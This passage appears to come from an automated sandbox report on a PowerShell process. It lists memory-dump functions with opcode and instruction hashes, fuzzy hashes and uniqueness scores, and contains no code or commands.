                                                Function 0863AA58 Relevance: .0, Instructions: 33COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d685b9d339f428b81ae646ac1cfa97935fa4430cce13198619da88f05ae05726
                                                • Instruction ID: bbf32fadc29e9245c14660068cf7cb31ad8c48a5a01b8409c93cf03e08a1c2b9
                                                • Opcode Fuzzy Hash: d685b9d339f428b81ae646ac1cfa97935fa4430cce13198619da88f05ae05726
                                                • Instruction Fuzzy Hash: B2F090369052689FDB149BA8D949BDEBBF5EF48302F05456ED842B7281CBB50C05CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0863E458 Relevance: .0, Instructions: 33COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1b710364e20628f4401a8d60a56ff6a704776cddb87a56c94f1e0edb40248015
                                                • Instruction ID: 71eef1ecac635354b48a9965c9c21b0c3ccb587784deca38d786bc373398b52e
                                                • Opcode Fuzzy Hash: 1b710364e20628f4401a8d60a56ff6a704776cddb87a56c94f1e0edb40248015
                                                • Instruction Fuzzy Hash: ADF050212046609BD3119B84D8F465A7B69EB89321F0A8079E505CB543CF16988687F1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08635650 Relevance: .0, Instructions: 31COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cbbb3ba7364ab21cf2418741b865fc5d1eeb0131fa883d6615b0f4eae647df12
                                                • Instruction ID: 613c87f199542fa6bfe8110ffdcc1db2b22f63757e013f5d232bc6502a91086c
                                                • Opcode Fuzzy Hash: cbbb3ba7364ab21cf2418741b865fc5d1eeb0131fa883d6615b0f4eae647df12
                                                • Instruction Fuzzy Hash: 79F0A0317002196F8704DB98E898DBF7BAAEFC8260B04442AF50597250CFB15C0597E5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 087FABC0 Relevance: .0, Instructions: 30COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985908941.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3672c9ca92a3188bf574b00013c5f4e54a7a31dcfd5cc031963986e0f7ac29e6
                                                • Instruction ID: 3e327e7769ec1a4a4fb286b5ee960eb8466b710500462c609c8e98ca62612a3c
                                                • Opcode Fuzzy Hash: 3672c9ca92a3188bf574b00013c5f4e54a7a31dcfd5cc031963986e0f7ac29e6
                                                • Instruction Fuzzy Hash: 6EF0D471E006299F8B44DFAEC8008DEBBF9EF8C611B10817AD508E7320E7709A01CBE4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08632698 Relevance: .0, Instructions: 29COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 533c52635cea6fa80b8918a773e88dacb6f3deb2f1a37e10c853e7cc02c59c62
                                                • Instruction ID: 990d0a14c36c90b28e7d190fb90dc6efed2acef8feed7fdfb66ca0d773ba980c
                                                • Opcode Fuzzy Hash: 533c52635cea6fa80b8918a773e88dacb6f3deb2f1a37e10c853e7cc02c59c62
                                                • Instruction Fuzzy Hash: 65E092322082942FD7019A76A8048AB7FAAEED6171719407BE888C7211EE31DC05C3A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 087F8200 Relevance: .0, Instructions: 28COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985908941.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 960f3bae4060edff3d00642377afc9b22472e7f42c8ab4b3423f403b8d67ba28
                                                • Instruction ID: 7d6629b9351f84337edc7fe3a4460f279952eb2ed51f7ef36b5c3eb37fa3fd5f
                                                • Opcode Fuzzy Hash: 960f3bae4060edff3d00642377afc9b22472e7f42c8ab4b3423f403b8d67ba28
                                                • Instruction Fuzzy Hash: 4AE06D2170D2C00FC71652BE24146AE5F954FC7431B1D06BFD145DB2D2CA988C0687B2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0863E468 Relevance: .0, Instructions: 28COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b916d18c319cad46a981e26607b68d411e47c96defd1ee421879e3c3a7752d4e
                                                • Instruction ID: 24ff0ed4f54d9d5a41e79570c0ced806cdf3421a6e736232cd5fdaf600933c3f
                                                • Opcode Fuzzy Hash: b916d18c319cad46a981e26607b68d411e47c96defd1ee421879e3c3a7752d4e
                                                • Instruction Fuzzy Hash: 19E09B3530066497D314AF45E8E8B1BB75EEBC8731F05403DE106DBA52CF2698829BF1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08638741 Relevance: .0, Instructions: 28COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1f8eed2ff9fae91b969466f1c522df5c2dc6de45804cfadf158e06df2f8bbb51
                                                • Instruction ID: 84533d4e4a78e2aa233f5e14a2a19b162d256a088a2bd7ec42816c98e250548a
                                                • Opcode Fuzzy Hash: 1f8eed2ff9fae91b969466f1c522df5c2dc6de45804cfadf158e06df2f8bbb51
                                                • Instruction Fuzzy Hash: 42E0C076509295AFD3058B55E884D57FFB8FF8A26531942D6E9088B203C721EC85CBF1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 087F81A8 Relevance: .0, Instructions: 27COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985908941.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9dfe72337fcdeacd36bb7329ea91d478206063d16e964a01c956aa31ace94212
                                                • Instruction ID: 31a3543cff9e3599bada1c8aafcb331b8f522022ad2ce64a5f53fee050e24cfa
                                                • Opcode Fuzzy Hash: 9dfe72337fcdeacd36bb7329ea91d478206063d16e964a01c956aa31ace94212
                                                • Instruction Fuzzy Hash: AEE09221D26348DECF11DBB18A042EE7FF8DB02112F1402FBD984D6241E630CB48DB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 087FAB70 Relevance: .0, Instructions: 27COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985908941.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_87f0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4c2be535d476a112bcaaacfe5013910780ed5b03e4c198a6799de66973e168e9
                                                • Instruction ID: 9096e8d2e44f62b2c3d594ec9d816dc8a3ba39674b66685ec8e957e5ab183269
                                                • Opcode Fuzzy Hash: 4c2be535d476a112bcaaacfe5013910780ed5b03e4c198a6799de66973e168e9
                                                • Instruction Fuzzy Hash: F1E01236F04118ABCB58DA9AE80969EB7FADBC8325F14807EE519D3341DA3859448F64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08637AC8 Relevance: .0, Instructions: 26COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 012600038f14dc3dd11372ae58e574ceea4bf656c4f82e62d7e9f1569e5934b0
                                                • Instruction ID: 6cc8f8493bb74b37af7c19bcd9995bc4d9b0fe5cbc381ab9b121bc1c1d7b0651
                                                • Opcode Fuzzy Hash: 012600038f14dc3dd11372ae58e574ceea4bf656c4f82e62d7e9f1569e5934b0
                                                • Instruction Fuzzy Hash: 6AE09272509190AFC3468B54E8508E6FF7AFECA26031D81C7E884CB253C229DD82CBE0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0863E35D Relevance: .0, Instructions: 26COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 361f40d579ea6e3e4a034ae3027dcd58ae9cc6c03b5676379749fe9080fac8b8
                                                • Instruction ID: ae97954558fda14093085b7ce0959f47c81109cb3afbc971b15e757600d073b8
                                                • Opcode Fuzzy Hash: 361f40d579ea6e3e4a034ae3027dcd58ae9cc6c03b5676379749fe9080fac8b8
                                                • Instruction Fuzzy Hash: 5FF0B734610218CFCB18DF65D494CDC77B2FF4931675040A8D4066B7A1DB3AE945CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0863AA68 Relevance: .0, Instructions: 25COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c4d5d82ec2578c9eb7eb0082755a8cb971a276be622328fb7b880b0709724daa
                                                • Instruction ID: c8cd89d27ecb41daea5ae8e31bdac265978bc1a4db6c9c879ecd652c9fea5b84
                                                • Opcode Fuzzy Hash: c4d5d82ec2578c9eb7eb0082755a8cb971a276be622328fb7b880b0709724daa
                                                • Instruction Fuzzy Hash: BBF039329002399BDB14AB98CA187EEBAF5EB88342F11456AD442B3380DBB51D04DBE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0863BA49 Relevance: .0, Instructions: 24COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0499631a2a1a8b2463e58be2f70af08e955ab2d56302fa2f4a63333229191626
                                                • Instruction ID: c6331eeed5beac0fc6b4cfbe4527c2b26b6ef8830e35cad4a628e431a3671706
                                                • Opcode Fuzzy Hash: 0499631a2a1a8b2463e58be2f70af08e955ab2d56302fa2f4a63333229191626
                                                • Instruction Fuzzy Hash: 16E0ED3A7001189FCB05DF95E4108EDBBB1FF88322B418066E954D7510D7319A66DB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 086749AC Relevance: .0, Instructions: 20COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984817224.0000000008670000.00000040.00000800.00020000.00000000.sdmp, Offset: 08670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8670000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1dd662b848a3c51d06fb5954518c97aad95f65b69e593df4e20087fdac114621
                                                • Instruction ID: 708eaf390b7a6531637ff117bf3a8a6353db29fb2ee4c0fe50f753ded26066da
                                                • Opcode Fuzzy Hash: 1dd662b848a3c51d06fb5954518c97aad95f65b69e593df4e20087fdac114621
                                                • Instruction Fuzzy Hash: D6E01739B05524CBDB381A64A5986ADB372FBC4A23F12A5AAE11392982CF3549024BC4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08637B51 Relevance: .0, Instructions: 20COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ae43c2075c7f777ae8c1abd75c7303cfe9fc7ae88aa1549f82201d78fa7e2d19
                                                • Instruction ID: 8350ca7afa0c9a8071fed1daa1a596c33c97e64618835f798df6ae6bb4c8b038
                                                • Opcode Fuzzy Hash: ae43c2075c7f777ae8c1abd75c7303cfe9fc7ae88aa1549f82201d78fa7e2d19
                                                • Instruction Fuzzy Hash: E3E012B210E2945FCB06DB58F5854C6BF22FAC121134A86E7D4458F16BC724AD45CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 086738EE Relevance: .0, Instructions: 16COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984817224.0000000008670000.00000040.00000800.00020000.00000000.sdmp, Offset: 08670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8670000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1f05cc6aab384f7276ed51546237f2743729d6f10ee8379c007c232f10e1455b
                                                • Instruction ID: 768d487777a75837aef48a545e126bba37a194e2f6cd4962b939510538bdda3e
                                                • Opcode Fuzzy Hash: 1f05cc6aab384f7276ed51546237f2743729d6f10ee8379c007c232f10e1455b
                                                • Instruction Fuzzy Hash: 3BD09E34708A018F9739CB39F454817B7E6DB84311311D86EE897C7B44EE31E8418E00
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08631E60 Relevance: .0, Instructions: 16COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8fe6ca79b268d829f67a2e1591901a25e4853df4e4aeab37d2c23a9a5eba3818
                                                • Instruction ID: 66c96f11d17c5f8f80eb3457421d8b9935d872ac46d7d2f092b7913a5365a7e5
                                                • Opcode Fuzzy Hash: 8fe6ca79b268d829f67a2e1591901a25e4853df4e4aeab37d2c23a9a5eba3818
                                                • Instruction Fuzzy Hash: 3BE01770509390AFC706CB28D890861BFB49F8B22432A84CED884CB263C636AC03C752
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 086738F0 Relevance: .0, Instructions: 15COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984817224.0000000008670000.00000040.00000800.00020000.00000000.sdmp, Offset: 08670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8670000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: acc3b1cc07fedea40e5ca2c1b3442f82794a4ca730e6cbb87f1d9dcfa0ee8662
                                                • Instruction ID: a415da862d3113137c90ac3b1a19bbe81e1d63a2ea15ea34b8d33cc4018faf91
                                                • Opcode Fuzzy Hash: acc3b1cc07fedea40e5ca2c1b3442f82794a4ca730e6cbb87f1d9dcfa0ee8662
                                                • Instruction Fuzzy Hash: B3D09235708A118B8728CA29B410853B7E6EB88321312C87EE85AC3704EE31EC028A44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08637AFF Relevance: .0, Instructions: 13COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 014be9e17f0fd147a53d56bbb076b6db6e03b88d7a081261025d8234b43d86af
                                                • Instruction ID: 71a27d5da3e49cef506f03d851807b4d932bbd2fa2bdaf651c6ba4dbcca351e5
                                                • Opcode Fuzzy Hash: 014be9e17f0fd147a53d56bbb076b6db6e03b88d7a081261025d8234b43d86af
                                                • Instruction Fuzzy Hash: 9AC0129140C7841BD2199A151C928CA2B74DA81270FD50B9AD1B59E9E3E20D19428992
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08632CED Relevance: .0, Instructions: 13COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 084b31c64f1b1f6c4a7309dadf9b63f041725d5ee171baf00dc99d9a8b32dfa6
                                                • Instruction ID: c480cd86ad8857253c4cd155d1056de8b691f97decee0858c619ac3668c39a79
                                                • Opcode Fuzzy Hash: 084b31c64f1b1f6c4a7309dadf9b63f041725d5ee171baf00dc99d9a8b32dfa6
                                                • Instruction Fuzzy Hash: E8D09E7470E2808FC706CB28D565915BF72BF8625031A89D6D0858B267D624AC45CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0863AD6B Relevance: .0, Instructions: 12COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f2ff1371de119bab5562afdec743b52ee6ce3977d4d42528b5ae6bde2cac2fda
                                                • Instruction ID: beba17c54ee1a638a530b0a4661c6ba2dc7f163866d8390a542368d4a54f7f65
                                                • Opcode Fuzzy Hash: f2ff1371de119bab5562afdec743b52ee6ce3977d4d42528b5ae6bde2cac2fda
                                                • Instruction Fuzzy Hash: 02D0C936A000089BCF008BC4E851ADDFB31FB84321F008022E61466154C2321526DB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08674A45 Relevance: .0, Instructions: 10COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984817224.0000000008670000.00000040.00000800.00020000.00000000.sdmp, Offset: 08670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8670000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4f1410ad15ffa10cc0a2b204092b114495b3fc41ef98ce70bb1cd33e36d8b7c2
                                                • Instruction ID: 5db4cb8f3161f606ba8c3f02b77a22783cdbecb9607a90287ef7df1bd2540791
                                                • Opcode Fuzzy Hash: 4f1410ad15ffa10cc0a2b204092b114495b3fc41ef98ce70bb1cd33e36d8b7c2
                                                • Instruction Fuzzy Hash: 22B09B3EB04014C78B54555474940DCF335E6C456771155B7F517920418F31451646C0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08674B1D Relevance: .0, Instructions: 10COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984817224.0000000008670000.00000040.00000800.00020000.00000000.sdmp, Offset: 08670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8670000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1a17742e475192f24c541222d6812ef644e26db760821850530ec472da1e21af
                                                • Instruction ID: 9343860f9b746e9b0b27fe9c21001ce5de9453b752da3a04bee3305b0a246962
                                                • Opcode Fuzzy Hash: 1a17742e475192f24c541222d6812ef644e26db760821850530ec472da1e21af
                                                • Instruction Fuzzy Hash: A9B09B36B040149B4F14559474940DCF375D6C412771154B7D117924018F31851646C1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08633D99 Relevance: .0, Instructions: 10COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a31e8ad925a8f9c10a7332a5da606f156c38636a13e19f00c91e19e59fe1b91d
                                                • Instruction ID: 8337c9dafcd1e7b19ff0789165ee7e8cf00b96373927ef274efe9c4a72624486
                                                • Opcode Fuzzy Hash: a31e8ad925a8f9c10a7332a5da606f156c38636a13e19f00c91e19e59fe1b91d
                                                • Instruction Fuzzy Hash: 94C08C3BB020189FCB00CB94F8848DCF371FBC8225B01C022E10183181C7305826DB00
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0863C75B Relevance: .0, Instructions: 9COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4984263353.0000000008630000.00000040.00000800.00020000.00000000.sdmp, Offset: 08630000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8630000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b90fe0174305e16658592e9204734d656ea18e87e528baf3dc0babe1297aee9e
                                                • Instruction ID: d2f6047c8c99fc65c3b861f91629ce38aadfbd2efdd85232710d4d0351b46916
                                                • Opcode Fuzzy Hash: b90fe0174305e16658592e9204734d656ea18e87e528baf3dc0babe1297aee9e
                                                • Instruction Fuzzy Hash: 70C04C36E0100D9FDB00DB88F4554DCF774EB84226B108022D621A3511C7311526DB71
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 08740012 Relevance: 36.9, Strings: 26, Instructions: 4351COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985397772.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8740000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0U}l$4'}l$4'}l$4'}l$4'}l$PH}l$lj$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l
                                                • API String ID: 0-2182098020
                                                • Opcode ID: b41c524d98533cdca34e9e9c96cb633a836be374e05718a8468d90d2384ff684
                                                • Instruction ID: 797f4afde3714b96dc0f1304e310be9cc2c343a861e1ea708ca0fcb2cee98216
                                                • Opcode Fuzzy Hash: b41c524d98533cdca34e9e9c96cb633a836be374e05718a8468d90d2384ff684
                                                • Instruction Fuzzy Hash: 82A30A74E092189FDB24DFA4D854BDE77B2EF84304F0149E99209AB294DF396E85CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08740040 Relevance: 36.8, Strings: 26, Instructions: 4326COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4985397772.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8740000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0U}l$4'}l$4'}l$4'}l$4'}l$PH}l$lj$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l
                                                • API String ID: 0-2182098020
                                                • Opcode ID: 0eace489f833d7e9d1345592f4664e5181f80be03748bf8f61c96391f171b875
                                                • Instruction ID: 13e995e9d3604359aed51754981ebf70f6611a01c72738350662da32f2ff01fc
                                                • Opcode Fuzzy Hash: 0eace489f833d7e9d1345592f4664e5181f80be03748bf8f61c96391f171b875
                                                • Instruction Fuzzy Hash: 82A3FA74E092189FDB24DFA4D854BDE77B2EF84304F0149E99209AB294DF396E85CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0505E827 Relevance: 10.1, Strings: 7, Instructions: 1307COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4962312820.0000000005050000.00000040.00000800.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_5050000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (_}l$,kj$4c}l$`Q}l$tP}l$$}l$c}l
                                                • API String ID: 0-534700746
                                                • Opcode ID: 996481813aded8faee81258a015e6624db97d942013d95e52b6f1111d1901d3d
                                                • Instruction ID: 0ffce4eec69985cc10bb5fae54dc269b0e325620dd87889c0fe0b26def751165
                                                • Opcode Fuzzy Hash: 996481813aded8faee81258a015e6624db97d942013d95e52b6f1111d1901d3d
                                                • Instruction Fuzzy Hash: 6BA27A34B042049FEB18ABB4DC10BEF3677ABC5714F188179A505AF784DF729C869B92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0505E858 Relevance: 10.0, Strings: 7, Instructions: 1287COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4962312820.0000000005050000.00000040.00000800.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_5050000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (_}l$,kj$4c}l$`Q}l$tP}l$$}l$c}l
                                                • API String ID: 0-534700746
                                                • Opcode ID: 47378358698e7509013cf307b30d1c6afd35d8ec9dbcde4021e4b0f8be6acadd
                                                • Instruction ID: 82bbb7719164920bb8062c960fdfa8ac7984497e37d23b01381e78351c5f3464
                                                • Opcode Fuzzy Hash: 47378358698e7509013cf307b30d1c6afd35d8ec9dbcde4021e4b0f8be6acadd
                                                • Instruction Fuzzy Hash: B3A27B34B042049FEB18ABB4DC10BEF3677ABC5714F188179A505AF784DF729C869B92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08F6E8A8 Relevance: 3.2, Strings: 2, Instructions: 717COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.4990038177.0000000008F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_8f60000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: c}l$c}l
                                                • API String ID: 0-2649445633
                                                • Opcode ID: 3fe75c461f8cff0980c141822b5058ed176d74029975c47db596f397604ff0d2
                                                • Instruction ID: c048fca0b7118d47c2dc7777c7d936173bdfa94ec3242c394cc46d85770e4afd
                                                • Opcode Fuzzy Hash: 3fe75c461f8cff0980c141822b5058ed176d74029975c47db596f397604ff0d2
